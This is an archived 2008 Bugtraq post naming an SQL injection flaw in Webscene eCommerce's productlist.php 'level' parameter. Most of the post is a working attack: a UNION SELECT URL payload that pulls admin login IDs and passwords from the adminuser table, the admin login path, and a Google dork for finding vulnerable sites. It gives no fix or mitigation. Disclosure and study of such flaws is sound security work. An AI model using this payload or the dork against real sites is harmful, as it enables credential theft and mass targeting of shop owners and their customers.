lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20081014162929.21251.qmail@securityfocus.com>
Date: 14 Oct 2008 16:29:29 -0000
From: angel@...ng.cc
To: bugtraq@...urityfocus.com
Subject: Webscene eCommerce (level) Remote Sql Injection

#################################################################################
#
#  Webscene eCommerce (level) Remote Sql Injection
#
#  vendor : http://www.webscenesolutions.com/ecommerce-shopping-websites-edinburgh.htm
#
#################################################################################
#
#
#       Bug Found By :Angela Chang (14-10-2008)
#
#       contact: angel[at]ch4ng.cc
#
#
################################################################################
#
#
#      Greetz: nyubi & Vrs-Chk
#
#
###############################################################################

vuln file : productlist.php

Input passed to the "level" is not properly verified
before being used. This can be exploited to execute
remote sql injection.

exploit : http://somehost/productlist.php?categoryid=20&level=[sql]
          http://somehost/productlist.php?categoryid=20&level=-4 union select concat(loginid,0x2f,password) from adminuser--

Login admin : http://somehost/admin/

         
Google dork : inurl:productlist.php?categoryid= level

########################################################################
                   __ _             _                              _                        __ _  
  __ _    _ _     / _` |   ___     | |    __ _      o O O   __    | |_     __ _    _ _     / _` | 
 / _` |  | ' \    \__, |  / -_)    | |   / _` |    o       / _|   | ' \   / _` |  | ' \    \__, | 
 \__,_|  |_||_|   |___/   \___|   _|_|_  \__,_|   TS__[O]  \__|_  |_||_|  \__,_|  |_||_|   |___/  
_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| {======|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| 
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'./o--000'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ